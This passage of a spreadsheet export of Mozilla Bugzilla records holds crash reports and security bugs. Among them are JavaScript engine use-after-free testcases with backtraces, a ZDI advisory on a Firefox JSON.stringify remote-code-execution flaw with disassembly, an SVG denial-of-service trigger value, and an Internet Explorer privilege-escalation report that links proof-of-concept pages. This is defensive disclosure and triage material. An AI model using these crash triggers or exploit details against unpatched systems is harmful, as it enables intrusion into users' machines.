      <c r="L5678" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5678" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5678" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5678" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5678" t="inlineStr">
        <is>
          <t>[sg:critical?][qa?]</t>
        </is>
      </c>
      <c r="Q5678" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5678" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5678" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5678" t="n">
        <v>1</v>
      </c>
      <c r="U5678" t="n">
        <v>0</v>
      </c>
      <c r="V5678" t="n">
        <v>14</v>
      </c>
      <c r="W5678" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-8a45c98b-589b-481f-99c1-f042b2110330 .
============================================================= 
Since 2011-03-29, but really on 2011-03-03, we see a rise in crashes with that signature, the comments in https://crash-stats.mozilla.com/report/list?signature=gl%3A%3AVertexDataConverter%3Cfloat%2C%20gl%3A%3AWidenRule%3Cint%2C%202%3E%2C%20gl%3A%3AConversionRule%3Cint%2C%200%2C%20int%3E%2C%20gl%3A%3ADefaultVertexValues%3Cfloat%2C%20int%3E%20%3E%3A%3AconvertArray%28float%20const%2A%2C%20unsigned%20int%2C%20unsigned%20int%2C%20float%2A%29 seem to almost all point to Google Labs' Body Map and http://bodybrowser.googlelabs.com/body.html# and as I heard this launched in the last days, the rise seems to correspond.
There was a small amount of crashes with this signature around before, 2-20 crashes per day when we still processed all crash reports. On 2011-03-30, we have 61 crashes with only 10% of all crashes being processed by the Socorro system (so in reality we probably have ~600), making this #186 on this day's topcrash list for 4.0* versions.</t>
        </is>
      </c>
      <c r="X5678" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5679">
      <c r="A5679" t="n">
        <v>1146213</v>
      </c>
      <c r="B5679" t="inlineStr">
        <is>
          <t>2015-03-22 19:16:33 -0700</t>
        </is>
      </c>
      <c r="C5679" t="inlineStr">
        <is>
          <t>Crash [@ js::NativeObject::setSlot] with off-thread compilation</t>
        </is>
      </c>
      <c r="D5679" t="inlineStr">
        <is>
          <t>2016-07-02 10:53:35 -0700</t>
        </is>
      </c>
      <c r="E5679" t="n">
        <v>1</v>
      </c>
      <c r="F5679" t="n">
        <v>1</v>
      </c>
      <c r="G5679" t="n">
        <v>3</v>
      </c>
      <c r="H5679" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5679" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5679" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5679" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5679" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5679" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5679" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5679" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5679" t="inlineStr">
        <is>
          <t>[jsbugmon:update][post-critsmash-triage][adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q5679" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5679" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5679" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T5679" t="n">
        <v>1</v>
      </c>
      <c r="U5679" t="n">
        <v>0</v>
      </c>
      <c r="V5679" t="n">
        <v>23</v>
      </c>
      <c r="W5679" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision b8e628af0b5c (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug, run with --fuzzing-safe --thread-count=2):
setGCCallback({
  action: "majorGC",
});
schedulegc(this)
gcslice(3)
var lfGlobal = newGlobal();
lfGlobal.offThreadCompileScript("");
lfGlobal.runOffThreadScript();
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
js::NativeObject::setSlot (this=0x4b4b4b4b4b4b4b4b, slot=1, value=...) at js/src/vm/NativeObject.h:785
#0  js::NativeObject::setSlot (this=0x4b4b4b4b4b4b4b4b, slot=1, value=...) at js/src/vm/NativeObject.h:785
#1  0x0000000000894375 in setReservedSlot (v=..., index=1, this=&lt;optimized out&gt;) at js/src/vm/NativeObject.h:851
#2  js::ScriptSourceObject::initFromOptions (cx=cx@entry=0x17376c0, source=..., source@entry=..., options=...) at js/src/jsscript.cpp:1388
#3  0x0000000000529599 in js::ParseTask::finish (this=this@entry=0x1810600, cx=cx@entry=0x17376c0) at js/src/vm/HelperThreads.cpp:240
#4  0x0000000000567eaf in js::GlobalHelperThreadState::finishParseTask (this=&lt;optimized out&gt;, maybecx=maybecx@entry=0x17376c0, rt=rt@entry=0x1715260, token=token@entry=0x1810600) at js/src/vm/HelperThreads.cpp:938
#5  0x0000000000833094 in JS::FinishOffThreadScript (maybecx=maybecx@entry=0x17376c0, rt=rt@entry=0x1715260, token=token@entry=0x1810600) at js/src/jsapi.cpp:3854
#6  0x000000000041b58c in runOffThreadScript (cx=cx@entry=0x17376c0, argc=&lt;optimized out&gt;, vp=0x7fffffffc2a8) at js/src/shell/js.cpp:3552
#7  0x000000000055d175 in CallJSNative (args=..., native=0x41b4f0 &lt;runOffThreadScript(JSContext*, unsigned int, jsval*)&gt;, cx=0x17376c0) at js/src/jscntxtinlines.h:235
#8  js::Invoke (cx=cx@entry=0x17376c0, args=..., construct=construct@entry=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:502
#9  0x000000000055e56a in js::Invoke (cx=cx@entry=0x17376c0, thisv=..., fval=..., argc=0, argv=&lt;optimized out&gt;, rval=...) at js/src/vm/Interpreter.cpp:558
#10 0x00000000008e7495 in js::DirectProxyHandler::call (this=this@entry=0x16f70c0 &lt;js::CrossCompartmentWrapper::singleton&gt;, cx=cx@entry=0x17376c0, proxy=..., proxy@entry=..., args=...) at js/src/proxy/DirectProxyHandler.cpp:77
#11 0x00000000008f38f1 in js::CrossCompartmentWrapper::call (this=0x16f70c0 &lt;js::CrossCompartmentWrapper::singleton&gt;, cx=0x17376c0, wrapper=..., args=...) at js/src/proxy/CrossCompartmentWrapper.cpp:288
#12 0x0000000000908ee7 in js::Proxy::call (cx=cx@entry=0x17376c0, proxy=proxy@entry=..., args=...) at js/src/proxy/Proxy.cpp:391
#13 0x0000000000908fca in js::proxy_Call (cx=cx@entry=0x17376c0, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;) at js/src/proxy/Proxy.cpp:703
#14 0x000000000055d330 in CallJSNative (args=..., native=0x908f80 &lt;js::proxy_Call(JSContext*, unsigned int, JS::Value*)&gt;, cx=0x17376c0) at js/src/jscntxtinlines.h:235
#15 js::Invoke (cx=0x17376c0, args=..., construct=js::NO_CONSTRUCT) at js/src/vm/Interpreter.cpp:495
#16 0x000000000055808d in Interpret (cx=0x17376c0, state=...) at js/src/vm/Interpreter.cpp:2600
#17 0x000000000055ce7d in js::RunScript (cx=cx@entry=0x17376c0, state=...) at js/src/vm/Interpreter.cpp:452
#18 0x0000000000562bb0 in js::ExecuteKernel (cx=cx@entry=0x17376c0, script=script@entry=..., scopeChainArg=..., thisv=..., type=type@entry=js::EXECUTE_GLOBAL, evalInFrame=..., evalInFrame@entry=..., result=result@entry=0x0) at js/src/vm/Interpreter.cpp:655
#19 0x00000000005647ec in js::Execute (cx=cx@entry=0x17376c0, script=script@entry=..., scopeChainArg=..., rval=rval@entry=0x0) at js/src/vm/Interpreter.cpp:695
#20 0x0000000000832b73 in ExecuteScript (cx=cx@entry=0x17376c0, obj=..., scriptArg=..., rval=rval@entry=0x0) at js/src/jsapi.cpp:4091
#21 0x0000000000832bf6 in JS_ExecuteScript (cx=cx@entry=0x17376c0, scriptArg=..., scriptArg@entry=...) at js/src/jsapi.cpp:4113
#22 0x00000000004059e5 in RunFile (compileOnly=false, file=0x180cf00, filename=&lt;optimized out&gt;, cx=0x17376c0) at js/src/shell/js.cpp:466
#23 Process (cx=cx@entry=0x17376c0, filename=&lt;optimized out&gt;, forceTTY=forceTTY@entry=false) at js/src/shell/js.cpp:597
#24 0x00000000004133e6 in ProcessArgs (op=0x7fffffffd9b0, cx=0x17376c0) at js/src/shell/js.cpp:5738
#25 Shell (envp=&lt;optimized out&gt;, op=0x7fffffffd9b0, cx=0x17376c0) at js/src/shell/js.cpp:6004
#26 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, envp=&lt;optimized out&gt;) at js/src/shell/js.cpp:6346
rax	0x7fffffffb8f0	140737488337136
rbx	0x17376c0	24344256
rcx	0x17376c0	24344256
rdx	0x7fffffffb850	140737488336976
rsi	0x1	1
rdi	0x4b4b4b4b4b4b4b4b	5425512962855750475
rbp	0x4b4b4b4b4b4b4b4b	5425512962855750475
rsp	0x7fffffffb7e0	140737488336864
r8	0x180ff98	25231256
r9	0x5c	92
r10	0x7ffff5671000	140737310560256
r11	0x0	0
r12	0x1	1
r13	0x7fffffffb840	140737488336960
r14	0x7fffffffb850	140737488336976
r15	0x0	0
rip	0x43f3a5 &lt;js::NativeObject::setSlot(unsigned int, JS::Value const&amp;)+21&gt;
=&gt; 0x43f3a5 &lt;js::NativeObject::setSlot(unsigned int, JS::Value const&amp;)+21&gt;:	mov    0x8(%rdi),%rax
   0x43f3a9 &lt;js::NativeObject::setSlot(unsigned int, JS::Value const&amp;)+25&gt;:	mov    0x10(%rax),%eax
Marking s-s because this looks like a use-after-free.</t>
        </is>
      </c>
      <c r="X5679" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5680">
      <c r="A5680" t="n">
        <v>185330</v>
      </c>
      <c r="B5680" t="inlineStr">
        <is>
          <t>2002-12-14 02:08:05 -0800</t>
        </is>
      </c>
      <c r="C5680" t="inlineStr">
        <is>
          <t>Checksetup.pl console input doesn't work on Win32 (linefeeds)</t>
        </is>
      </c>
      <c r="D5680" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E5680" t="n">
        <v>1</v>
      </c>
      <c r="F5680" t="n">
        <v>1</v>
      </c>
      <c r="G5680" t="n">
        <v>4</v>
      </c>
      <c r="H5680" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5680" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5680" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K5680" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L5680" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5680" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N5680" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5680" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5680" t="inlineStr">
        <is>
          <t>[needed for Win32bz]</t>
        </is>
      </c>
      <c r="Q5680" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5680" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5680" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T5680" t="n">
        <v>1</v>
      </c>
      <c r="U5680" t="n">
        <v>0</v>
      </c>
      <c r="V5680" t="n">
        <v>29</v>
      </c>
      <c r="W5680" t="inlineStr">
        <is>
          <t>When trying to enter an administrator password on Win32, I can enter the pwd but
when hitting enter, it doesn't give an error message but rather just reprints
the prompt. I've been unable to get this to work. Luckily Joel implemented the
non-interactive checksetup, so that I could use it. ;-)</t>
        </is>
      </c>
      <c r="X5680" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5681">
      <c r="A5681" t="n">
        <v>616009</v>
      </c>
      <c r="B5681" t="inlineStr">
        <is>
          <t>2010-12-01 15:29:57 -0800</t>
        </is>
      </c>
      <c r="C5681" t="inlineStr">
        <is>
          <t>JSON.stringify Dangling Pointer Remote Code Execution Vulnerability (ZDI-CAN-971)</t>
        </is>
      </c>
      <c r="D5681" t="inlineStr">
        <is>
          <t>2013-03-20 08:36:15 -0700</t>
        </is>
      </c>
      <c r="E5681" t="n">
        <v>1</v>
      </c>
      <c r="F5681" t="n">
        <v>1</v>
      </c>
      <c r="G5681" t="n">
        <v>3</v>
      </c>
      <c r="H5681" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5681" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5681" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5681" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5681" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5681" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5681" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5681" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5681" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5681" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5681" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5681" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5681" t="n">
        <v>1</v>
      </c>
      <c r="U5681" t="n">
        <v>0</v>
      </c>
      <c r="V5681" t="n">
        <v>24</v>
      </c>
      <c r="W5681" t="inlineStr">
        <is>
          <t>Created attachment 494528
PoC
ZDI-CAN-971: Mozilla Firefox JSON.stringify Dangling Pointer Remote Code Execution Vulnerability
-- CVSS ----------------------------------------------------------------
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- ABSTRACT ------------------------------------------------------------
TippingPoint has identified a vulnerability affecting the following
products:
    Mozilla Firefox 3.6.x
-- VULNERABILITY DETAILS -----------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Firefox. User interaction is required to
exploit this vulnerability in that the target must visit a malicious
page or open a malicious file.
The specific flaw exists within js3250.dll. In the JSON.stringify() call
chain js_HasOwnProperty() is called with an invalid pointer. The pointer
becomes invalid due to being unrooted and garbage collection occurring.
Dereferecing of this pointer allows a remote attacker to execute
arbitrary code in the context of the user running the browser.
Version(s)  tested: Firefox 3.6.10
Platform(s) tested: Windows XP SP3 x86
There is a GC hazard in function |JO|. One can see that |obj| is rooted
only at |vp[0]|. Then, if there is no replacer object associated or
replacer is an array, |js_ValueToIterator| is called returning iterator
instance at
|keySource|, where |keySource| is a pointer == |vp|. Thus |obj| becomes
unrooted while still being used as an argument in several functions'
invocations along the |JO| body.
POC triggers a jump to an invalid address in ecx, below:
0:000&gt; ub 0033e2a1  
js3250!js_LookupProperty+0x497f:
0033e28f 70dd            jo      js3250!js_LookupProperty+0x495e
(0033e26e)
0033e291 54              push    esp
0033e292 2478            and     al,78h
0033e294 e9dcf0ffff      jmp     js3250!js_LookupProperty+0x3a65
(0033d375)
0033e299 8b542438        mov     edx,dword ptr [esp+38h]
0033e29d 50              push    eax
0033e29e 52              push    edx
0033e29f ffd1            call    ecx
Call Stack:
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be
wrong.
0012ea70 0033e2a1 &lt;Unloaded_ta.dll&gt;+0x14f859f
0012eca4 00338556 js3250!js_LookupProperty+0x4991
0012ed48 0032cfd3 js3250!js_Invoke+0x286
0012ed78 0030ea07 js3250!JS_CloneFunctionObject+0x1493
0012ee2c 0030f8ff js3250!JS_CallFunctionValue+0x27
0012eef0 00370e96 js3250!js_AllocStack+0x24f
0012f02c 0033bbaa js3250!JS_NewArrayObject+0x316
0012f26c 00338556 js3250!js_LookupProperty+0x229a
0012f310 0032cfd3 js3250!js_Invoke+0x286
0012f340 0030ea07 js3250!JS_CloneFunctionObject+0x1493
0012f3e4 100be05a js3250!JS_CallFunctionValue+0x27
0012f590 1009635d xul!gfxRect::Condition+0x28a
0012f680 101066c1 xul!gfxWindowsFontGroup::MakeTextRun+0x1130c
0012f6e0 10106b71 xul!NS_Free_P+0x3f1
0012f728 1010ed88 xul!NS_Free_P+0x8a1
0012f7b4 1007482b xul!NS_Free_P+0x8ab8
0012f81c 10091ba7 xul!gfxWindowsSurface::gfxWindowsSurface+0x6c1b
0012f9b0 1011217e xul!gfxWindowsFontGroup::MakeTextRun+0xcb56
0012f9b4 100f11ab xul!NS_CycleCollectorSuspect2_P+0x15ee
0012f9d4 1006c81e xul!gfxRect::gfxRect+0x101b
0:000&gt; ub 0033e2a1  
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X5681" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5682">
      <c r="A5682" t="n">
        <v>465615</v>
      </c>
      <c r="B5682" t="inlineStr">
        <is>
          <t>2008-11-18 14:57:53 -0800</t>
        </is>
      </c>
      <c r="C5682" t="inlineStr">
        <is>
          <t>Very long Radius value for CIRCLE attribute in SVG results in DoS Condition</t>
        </is>
      </c>
      <c r="D5682" t="inlineStr">
        <is>
          <t>2009-06-07 06:55:30 -0700</t>
        </is>
      </c>
      <c r="E5682" t="n">
        <v>1</v>
      </c>
      <c r="F5682" t="n">
        <v>1</v>
      </c>
      <c r="G5682" t="n">
        <v>3</v>
      </c>
      <c r="H5682" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5682" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5682" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5682" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5682" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5682" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5682" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5682" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P5682" t="inlineStr">
        <is>
          <t>[sg:dos]</t>
        </is>
      </c>
      <c r="Q5682" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5682" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5682" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5682" t="n">
        <v>1</v>
      </c>
      <c r="U5682" t="n">
        <v>0</v>
      </c>
      <c r="V5682" t="n">
        <v>11</v>
      </c>
      <c r="W5682" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
r='1.79769313486231E+308' 
Reproducible: Always
Steps to Reproduce:
1.Open attached file
2.
3.
Actual Results:  
Consumes lots of ressources and not longer response to user input</t>
        </is>
      </c>
      <c r="X5682" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5683">
      <c r="A5683" t="n">
        <v>1385179</v>
      </c>
      <c r="B5683" t="inlineStr">
        <is>
          <t>2017-07-27 22:41:32 -0700</t>
        </is>
      </c>
      <c r="C5683" t="inlineStr">
        <is>
          <t>Unhide addresses sync engine by default</t>
        </is>
      </c>
      <c r="D5683" t="inlineStr">
        <is>
          <t>2017-08-24 12:02:04 -0700</t>
        </is>
      </c>
      <c r="E5683" t="n">
        <v>1</v>
      </c>
      <c r="F5683" t="n">
        <v>1</v>
      </c>
      <c r="G5683" t="n">
        <v>2</v>
      </c>
      <c r="H5683" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5683" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5683" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K5683" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5683" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5683" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5683" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5683" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5683" t="inlineStr">
        <is>
          <t>[form autofill:M3]</t>
        </is>
      </c>
      <c r="Q5683" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5683" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5683" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T5683" t="n">
        <v>1</v>
      </c>
      <c r="U5683" t="n">
        <v>0</v>
      </c>
      <c r="V5683" t="n">
        <v>10</v>
      </c>
      <c r="W5683" t="inlineStr">
        <is>
          <t>We should enable the "addresses" engine by default. Credit-cards will be enabled at a later time.</t>
        </is>
      </c>
      <c r="X5683" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5684">
      <c r="A5684" t="n">
        <v>526689</v>
      </c>
      <c r="B5684" t="inlineStr">
        <is>
          <t>2009-11-04 18:43:31 -0800</t>
        </is>
      </c>
      <c r="C5684" t="inlineStr">
        <is>
          <t>SSL3 &amp; TLS Renegotiation Vulnerability</t>
        </is>
      </c>
      <c r="D5684" t="inlineStr">
        <is>
          <t>2010-10-18 10:49:15 -0700</t>
        </is>
      </c>
      <c r="E5684" t="n">
        <v>1</v>
      </c>
      <c r="F5684" t="n">
        <v>1</v>
      </c>
      <c r="G5684" t="n">
        <v>3</v>
      </c>
      <c r="H5684" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5684" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5684" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5684" t="inlineStr">
        <is>
          <t>3.12.4</t>
        </is>
      </c>
      <c r="L5684" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5684" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5684" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5684" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5684" t="inlineStr">
        <is>
          <t>[sg:high][3.6.x]</t>
        </is>
      </c>
      <c r="Q5684" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5684" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5684" t="inlineStr">
        <is>
          <t>3.12.5</t>
        </is>
      </c>
      <c r="T5684" t="n">
        <v>1</v>
      </c>
      <c r="U5684" t="n">
        <v>0</v>
      </c>
      <c r="V5684" t="n">
        <v>80</v>
      </c>
      <c r="W5684" t="inlineStr">
        <is>
          <t>Existence of a vulnerability in SSL3/TLS renegotiation was publicly 
disclosed today.  Full details not yet publicly disclosed.</t>
        </is>
      </c>
      <c r="X5684" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5685">
      <c r="A5685" t="n">
        <v>1721107</v>
      </c>
      <c r="B5685" t="inlineStr">
        <is>
          <t>2021-07-18 19:29:30 -0700</t>
        </is>
      </c>
      <c r="C5685" t="inlineStr">
        <is>
          <t>Use of mk:@MSITStore: URI from Firefox can run JavaScript in IE with res: URI</t>
        </is>
      </c>
      <c r="D5685" t="inlineStr">
        <is>
          <t>2024-05-30 10:34:57 -0700</t>
        </is>
      </c>
      <c r="E5685" t="n">
        <v>1</v>
      </c>
      <c r="F5685" t="n">
        <v>1</v>
      </c>
      <c r="G5685" t="n">
        <v>3</v>
      </c>
      <c r="H5685" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5685" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5685" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5685" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5685" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5685" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5685" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5685" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5685" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [adv-main92+][adv-esr78.14+][adv-esr91.1+]</t>
        </is>
      </c>
      <c r="Q5685" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5685" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5685" t="inlineStr">
        <is>
          <t>93 Branch</t>
        </is>
      </c>
      <c r="T5685" t="n">
        <v>1</v>
      </c>
      <c r="U5685" t="n">
        <v>0</v>
      </c>
      <c r="V5685" t="n">
        <v>17</v>
      </c>
      <c r="W5685" t="inlineStr">
        <is>
          <t>We are able to reproduce bug id 1549833 and 1552627 (https://bugzilla.mozilla.org/show_bug.cgi?id=1552627) using mk:@MSITStore: URI.
1. We can run Internet Explorer from chrome, which allows us to run JavaScript at renderer process privilege (Low or AppContainer IL, depending on user's IE11 EPM Sandbox setting). 
https://pwning.click/ffscheme.php
2. Elevation of Privilege- from AppContainer or Low Integrity Level to Medium IL JavaScript execution 
https://pwning.click/ffscheme2.php
3. Other bugs- Security Feature bypass such as running VBScript at Medium Integrity Level, which should be not possible from Internet Zone IE11 : this is possible because IE let attackers reading OS username (Test on https://pwning.click/osuname.php) which allows running downloaded file from the Website after the browser crashes and reopens (the downloaded .html file will open automatically after the crash, which runs Medium IL VBScript). 
Reading/running local files and more
https://pwning.click/ffscheme3.php
Fix- Filter mk:@MSITStore: URI</t>
        </is>
      </c>
      <c r="X5685" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5686">
      <c r="A5686" t="n">
        <v>1114058</v>
      </c>
      <c r="B5686" t="inlineStr">
        <is>
          <t>2014-12-20 09:35:21 -0800</t>
        </is>
      </c>
      <c r="C5686" t="inlineStr">
        <is>
          <t>Crash [@ js::RegExpShared::~RegExpShared]</t>
        </is>
      </c>
      <c r="D5686" t="inlineStr">
        <is>
          <t>2016-06-04 16:12:49 -0700</t>
        </is>
      </c>
      <c r="E5686" t="n">
        <v>1</v>
      </c>
      <c r="F5686" t="n">
        <v>1</v>
      </c>
      <c r="G5686" t="n">
        <v>3</v>
      </c>
      <c r="H5686" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5686" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5686" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K5686" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5686" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5686" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5686" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5686" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5686" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main36+]</t>
        </is>
      </c>
      <c r="Q5686" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5686" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5686" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T5686" t="n">
        <v>1</v>
      </c>
      <c r="U5686" t="n">
        <v>0</v>
      </c>
      <c r="V5686" t="n">
        <v>24</v>
      </c>
      <c r="W5686" t="inlineStr">
        <is>
          <t>// Randomly chosen test: js/src/jit-test/tests/auto-regress/bug812235.js
gcslice(3)
// Randomly chosen test: js/src/tests/test262/ch07/7.8/7.8.5/S7.8.5_A2.1_T2.js
var hex = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F"];
for (var i1 = 0; i1 &lt; 16; i1++) {
    for (var i2 = 0; i2 &lt; 16; i2++) {
        for (var i3 = 0; i3 &lt; 16; i3++) {
            for (var i4 = 0; i4 &lt; 16; i4++) {
                try {
                    var uu = hex[i1] + hex[i2] + hex[i3] + hex[i4];
                    eval("/" + String.fromCharCode("0x" + uu) + "/");
                } catch (e) {}
            }
        }
    }
}
// Randomly chosen test: js/src/jit-test/tests/debug/bug-826669.js
gczeal(9, 2)
newGlobal();
crashes 32-bit js debug shell on m-c changeset 490f124d7dea with --fuzzing-safe --no-threads --ion-eager at js::RegExpShared::~RegExpShared.
Debug configure options:
